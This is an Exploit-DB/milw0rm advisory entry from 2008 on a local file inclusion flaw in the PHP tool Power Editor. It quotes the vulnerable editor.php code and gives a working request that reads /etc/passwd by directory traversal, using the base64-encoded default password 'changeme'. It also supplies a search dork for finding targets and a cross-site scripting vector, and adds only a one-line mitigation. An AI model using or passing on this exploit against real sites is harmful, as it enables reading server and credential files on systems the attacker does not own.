Power Editor LOCAL FILE INCLUSION Vulnerbility

vendor:

Power Editor

by:

Virangar Security Team (hadihadi)

8.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Power Editor

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Power Editor LOCAL FILE INCLUSION Vulnerbility

A local file inclusion vulnerability exists in Power Editor, which allows an attacker to include a file from the local system. This can be exploited to execute arbitrary PHP code by including files from the local system. The vulnerability is located in the 'editor.php' script when the 'action' parameter is set to 'tempedit'. The 'm' parameter is base64 encoded and is used to authenticate the user. The 'te' parameter is used to specify the file to include and the 'dir' parameter is used to specify the directory. Successful exploitation requires that 'register_globals' is set to 'on'.

Mitigation:

Disable 'register_globals' and filter input passed to the 'te' and 'dir' parameters.

Source

Exploit-DB raw data:

	     ########################################################################
             #                                                                      #
             #    ..:::::Power Editor LOCAL FILE INCLUSION Vulnerbility ::::...     #           
             ########################################################################

Virangar Security Team

www.virangar.net

--------
Discoverd By :Virangar Security Team (hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
download:http://www.scriptsez.net/index.php?action=details&cat=Content%20Management&id=1063623812
dork: Powered By Power Editor
-----------------------------------
vuln code in editor.php:
line 84-94:
if ($action=="tempedit") {
$n=base64_decode($m);    
if ($n==$password){
template();
$te=$HTTP_GET_VARS['te'];
$dir=$HTTP_GET_VARS['dir'];
$filename = "$dir/$te";
$fd = fopen ($filename, "r");
$stuff = fread ($fd, filesize ($filename));
fclose ($fd);
?>
-------
vuln:
http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir]
examp:
editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..

-------------------------------------
and xss here :D :
http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[xss]&dir=[xss]
-----
note:
default pass for login is:changeme
-----
young iranian h4ck3rz
/* tnx 2:
st0rke,aria-security.net,r00tshell.org,all h4ck3rz */

# milw0rm.com [2008-05-05]